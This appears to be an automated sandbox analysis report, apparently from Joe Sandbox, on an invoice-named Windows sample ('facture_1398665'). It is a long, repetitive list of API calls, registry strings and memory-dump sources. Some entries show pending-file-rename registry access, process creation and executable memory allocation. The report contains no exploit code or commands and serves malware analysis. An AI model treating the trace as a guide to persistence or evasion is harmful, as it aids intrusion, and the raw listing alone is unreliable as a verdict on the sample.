    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,004B05EB,?,00000001,00000000), ref: 004B05DE
    Strings
    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004B058C
    • PendingFileRenameOperations, xrefs: 004B05B0
    • PendingFileRenameOperations2, xrefs: 004B05BF
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00480B10: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480B1E
      • Part of subcall function 00480B10: ShutdownBlockReasonDestroy.USER32(?,00000000,user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000), ref: 00480B30
    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000,004E2D5F), ref: 00480A98
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • ShutdownBlockReasonCreate.USER32(?,00000000,00000000,user32.dll,ShutdownBlockReasonCreate,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480AB2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480B1E
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • ShutdownBlockReasonDestroy.USER32(?,00000000,user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000), ref: 00480B30
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000077), ref: 00460943
    • DefWindowProcW.USER32(00000000,?,?,?), ref: 00460C4D
      • Part of subcall function 00457D94: GetCapture.USER32 ref: 00457D94
    • _TrackMouseEvent.COMCTL32(00000010), ref: 00460BFB
      • Part of subcall function 00460654: GetCapture.USER32 ref: 00460667
      • Part of subcall function 004606FC: GetMessagePos.USER32 ref: 0046070B
      • Part of subcall function 004606FC: GetKeyboardState.USER32(?), ref: 00460808
    • GetCapture.USER32 ref: 00460CB8
      • Part of subcall function 0045C584: GetKeyboardState.USER32(?), ref: 0045C7F2
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • CreateMutexW.KERNEL32(?,?,?,?,004FE333,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?), ref: 0040946E
    • InterlockedCompareExchange.KERNEL32(00000001), ref: 0040951C
    • GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
    • GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045E55B
    • MulDiv.KERNEL32(?,?,?), ref: 0045E5BF
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045E5FF
    • MulDiv.KERNEL32(?,?,?), ref: 0045E63A
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SendMessageW.USER32(00000000,000000BB,?,00000000), ref: 00443194
    • SendMessageW.USER32(00000000,000000BB,?,00000000), ref: 004431C3
    • SendMessageW.USER32(00000000,000000C1,00000000,00000000), ref: 004431DF
    • SendMessageW.USER32(00000000,000000B1,00000000,00000000), ref: 0044320A
      • Part of subcall function 00414FF4: SendMessageW.USER32(?,?,?,00000000), ref: 00415022
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetClassInfoW.USER32(00400000,0042BDB4,?), ref: 0042BDF1
    • UnregisterClassW.USER32(0042BDB4,00400000), ref: 0042BE1A
    • RegisterClassW.USER32(00502ED0), ref: 0042BE24
      • Part of subcall function 0040A124: CreateWindowExW.USER32(00000000,TWindowDisabler-Window,00000000,0048159E,?,?,?,00000001,00000000,?,W3K,?), ref: 0040A163
      • Part of subcall function 0042BD08: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,0050BC38,00000000,00000000,?,0042BE6B,00000000,00000B06,00000000,00400000,00000000,00000000,00000000), ref: 0042BD26
    • SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 0042BE6F
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • EnumWindows.USER32(Function_0007AE10), ref: 0047AEF1
    • GetWindow.USER32(?,00000003), ref: 0047AF09
    • GetWindowLongW.USER32(00000000,000000EC), ref: 0047AF16
    • SetWindowPos.USER32(00000000,000000EC,00000000,00000000,00000000,00000000,00000213), ref: 0047AF55
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • WaitForInputIdle.USER32(00000001,00000032), ref: 004AF9D4
    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004AF9F6
    • GetExitCodeProcess.KERNEL32(00000001,?), ref: 004AFA07
    • CloseHandle.KERNEL32(00000001), ref: 004AFA27
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AE369,?,00000000,0050B17C,00000003,00000000,00000000,?,004DE8D3,00000000,004DE9FE), ref: 004AE2BC
    • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AE369,?,00000000,0050B17C,00000003,00000000,00000000,?,004DE8D3,00000000,004DE9FE), ref: 004AE2C5
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004ACF58: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF73
      • Part of subcall function 004ACF58: SetLastError.KERNEL32(00000001,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF8A
    • CreateProcessW.KERNEL32(00000000,00000000,?,?,?,004B3204,00000000,1K,?,?), ref: 004AD070
    • GetLastError.KERNEL32(00000000,004AD096,?,?,?,00000001), ref: 004AD078
      • Part of subcall function 004ACF94: Wow64RevertWow64FsRedirection.KERNEL32(?,004AD5BB,004AD5C3,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF9D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
    • EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 00480DC4
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
      • Part of subcall function 00413C38: SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
      • Part of subcall function 00413C38: LoadLibraryW.KERNEL32(00000000), ref: 00413C71
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • CreateWindowExW.USER32(00000000,TWindowDisabler-Window,00000000,0048159E,?,?,?,00000001,00000000,?,W3K,?), ref: 0040A163
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetSystemMetrics.USER32(?), ref: 0042DAEE
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    • GetSystemMetrics.USER32(?), ref: 0042DAB4
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,004DE54B,00000000,004DE566,?,00000005,00000000,00000000,?,004FCCF4), ref: 004DE22E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E939
    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E9A9
    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?), ref: 0042EA14
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004FB0AC: MulDiv.KERNEL32(?,?,00000006), ref: 004FB129
      • Part of subcall function 004FB0AC: MulDiv.KERNEL32(?,?,0000000D), ref: 004FB13E
      • Part of subcall function 004FA8F0: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004FA901
      • Part of subcall function 004FA8F0: GetSystemMetrics.USER32(00000001), ref: 004FA90C
      • Part of subcall function 004FA8F0: GetSystemMetrics.USER32(00000000), ref: 004FA915
      • Part of subcall function 00474F08: ShowWindow.USER32(00000000,?), ref: 00474F3E
      • Part of subcall function 00474420: GetWindowLongW.USER32(00000000,000000F0), ref: 00474491
      • Part of subcall function 00474420: GetWindowLongW.USER32(00000000,000000EC), ref: 004744A3
      • Part of subcall function 00474420: GetClassLongW.USER32(00000000,000000E6), ref: 004744B6
      • Part of subcall function 00474420: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004744F6
      • Part of subcall function 00474420: SetWindowLongW.USER32(00000000,000000EC,?), ref: 0047450A
      • Part of subcall function 00474420: SetClassLongW.USER32(00000000,000000E6,?), ref: 0047451E
      • Part of subcall function 00474420: SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474558
      • Part of subcall function 00474420: SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474570
      • Part of subcall function 00474420: GetSystemMenu.USER32(00000000,000000FF), ref: 0047457F
      • Part of subcall function 00474420: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004745A8
    • GetSystemMenu.USER32(00000000,00000000), ref: 004E4721
    • AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 004E4732
    • AppendMenuW.USER32(00000000,00000000,0000270F,00000000), ref: 004E474C
      • Part of subcall function 0047C3E4: SendMessageW.USER32(?,0000B020,00000000,?), ref: 0047C409
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00412612), ref: 0041257E
    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125B3
    • VerQueryValueW.VERSION(?,00412624,?,?,00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125CD
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetFileVersionInfoSizeW.VERSION(00000000,?,?,?,?), ref: 004ACCF8
    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004ACD73,?,00000000,?,?,?,?), ref: 004ACD25
    • VerQueryValueW.VERSION(?,004ACD9C,?,?,00000000,?,00000000,?,00000000,004ACD73,?,00000000,?,?,?,?), ref: 004ACD3F
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00412612), ref: 0041257E
    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125B3
    • VerQueryValueW.VERSION(?,00412624,?,?,00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125CD
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 004802A3
    • EnumFontsW.GDI32(?,00000000,00480280,00000000), ref: 004802CE
    • ReleaseDC.USER32(00000000,?), ref: 004802E6
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • IsWindowVisible.USER32(?), ref: 00470BBC
    • IsWindowEnabled.USER32(?), ref: 00470BC6
    • EnableWindow.USER32(?,00000000), ref: 00470BEC
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004C9FAC: SHPathPrepareForWriteW.SHELL32(00000000,00000000,00000000,00000000), ref: 004C9FEF
